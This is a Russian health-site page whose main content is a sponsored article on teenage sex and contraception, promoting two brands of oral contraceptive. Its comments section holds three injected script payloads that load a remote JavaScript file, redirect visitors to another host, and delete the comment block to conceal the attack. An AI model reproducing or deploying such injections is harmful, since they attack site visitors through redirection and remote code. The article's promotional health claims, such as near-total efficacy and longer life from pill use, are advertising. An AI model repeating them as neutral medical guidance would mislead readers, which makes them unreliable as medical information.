Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Молодость и секс. Как себ...  >>  Молодость и секс. Как себя вести?
 
Обратная связь
 

Молодость и секс. Как себя вести?

Размер шрифта
11 сентября 2013 00:00
  • google_analytics: false
  • Нравится

Юность, молодость – это настоящий весенний расцвет человека. Сердца полны любви, разум еще не омрачен тяготами взрослой жизни, а тело пышет здоровьем. В это время юный человек впервые открывает для себя многие прекрасные аспекты жизни, в том числе и радость первого секса. Как не омрачить ее, не растоптать в пух и прах, не искорежив попутно свою жизнь?

Молодость и секс. Как себя вести?

В возрастной группе 12-19 лет сексуально активные подростки составляют около 60%. К 15-летнему возрасту первый сексуальный дебют имеют 5,6% девушек, к 17 годам –

39,4-47,8%, а к 19 – 81,7%. Средний возраст сексуального дебюта у девушек в нашей стране приходится на 17,4±1,5лет. Для многих подростков начало сексуальной

жизни является элементом самоутверждения, отказа от контроля и опеки родителей, вхождения во взрослую жизнь. О беременности при этом никто не задумывается: 85% молодых людей обоих полов, вступающих в сексуальные отношения, планируют заводить детей через 5-8 лет от момента сексуального дебюта.

Наличие непостоянных сексуальных партнеров, в том числе случайных, способствует повышенному риску заболеваний, передающихся половым путем (ЗППП). К ним относятся сифилис, гонорея, трихомониаз, хламидиоз, уреаплазмоз, генитальный герпес, остроконечные кондиломы и другие куда более опасные заболевания – ВИЧ, гепатит В и С. Все это представляет огромную опасность для здоровья подрастающего поколения и для здоровья общества в целом.

Нежелательная беременность – другое крайне неприятное следствие незащищенного секса. Она грозит первым абортом или незапланированными первыми родами. Согласитесь, ни  родителей, ни 17-19 летнюю девушку не прельщает эта перспектива. Вероятнее всего, возникнет вопрос об аборте. Эта процедура может оставить глубокий след в душе молодой девушки и осложнить последующие запланированные беременности.

Этой проблемы можно легко избежать, если  правильно подобрать метод контрацепции.   Какие же методы контрацепции оптимальны в подростковом возрасте?

Одним из самых распространенных, но самых неэффективных методов контрацепции у подростков является прерванный половой акт. Согласно статистике, из 100 пар, пользующихся этим методом, около 20-25 сталкиваются с проблемой нежелательной беременности. Во-первых, не каждый подросток  способен контролировать себя в момент оргазма, а во-вторых, некоторое количество сперматозоидов выделяется в самом начале полового акта вместе с естественной смазкой. Кроме ненадежности этого метода, следует заметить его вредность с психологической и неврологической точки зрения.

Еще один распространенный метод среди молодежи  – барьерная контрацепция. Барьерный метод контрацепции основан на использовании средств, создающих механическое препятствие для проникновения сперматозоидов во влагалище и матку. К ним относятся презервативы, шеечные колпачки, диафрагмы. Самый распространенный из них – презерватив. Использование презерватива предохраняет не только от нежелательной беременности, но и от заражения инфекциями, передающимися половым путем, в том числе ВИЧ-инфекцией. Однако контрацептивная эффективность презерватива у подростков, из-за неправильного использования непосредственно в момент полового акта невысока, и составляет 50-75%.

Гормональная контрацепция  является одним из наиболее надежных методов предупреждения беременности, эффективность метода составляет практически 100%, и именно поэтому занимает одно из ведущих мест в мире среди методов регулирования рождаемости. Любая противозачаточная таблетка – это, чаще всего, сочетание двух женских половых гормонов – эстрогена и гестагена, причем в минимальных количествах. Таблетки подавляют секрецию гонадотропных гормонов, овуляторную функцию яичников, повышают вязкость цервикальной слизи, препятствуя проникновению сперматозоидов в полость матки. Таким образом, прием таблеток предотвращает овуляцию и оплодотворение яйцеклетки не происходит. Подавляющее большинство акушеров-гинекологов уверены, что для юных девушек лучшим выбором являются микродозированные комбинированные оральные контрацептивы (КОК) с прогестагенами третьего поколения. Они содержат минимальные дозы гормонов – всего 0,02 миллиграмма этинилэстрадиола и 0,075 миллиграмма гестодена. Гестоден – один из самых современных гестагенных компонентов, использующихся в пероральных контрацептивах, поэтому такие препараты, как Линдинет 20 или Димиа, обладают отличной переносимостью.

Вывод. Современные КОК отвечают всем требованиям безо­пасности и надежности. Эпидемиологические исследова­ния свидетельствуют, что 5-летнее использование КОК женщинами в возрасте до 30 лет увеличивает продолжи­тельность их жизни. Пероральные контрацептивы Линдинет-20 и Димиа защитят от нежелательной беременности, не влияя на образ жизни.

Назначение комбинированной оральной контрацеп­ции подросткам не только сохраняет репродуктивное здоровье, но и имеет большое значение в обеспечении общего здоровья женщин.

Обязательно проконсультируйтесь с врачом перед началом пользования контрацептивами.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:04

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Московский музей «Живые системы» приглашает всех   Селфи убивает больше людей, чем акулы!   Сколько можно выпить и не умереть?   Как быть здоровым ничего не делая  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Есть ли секс во время беременности?
Как повысить свою плодовитость
Проблемы, с которыми справится секс. Часть 4

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.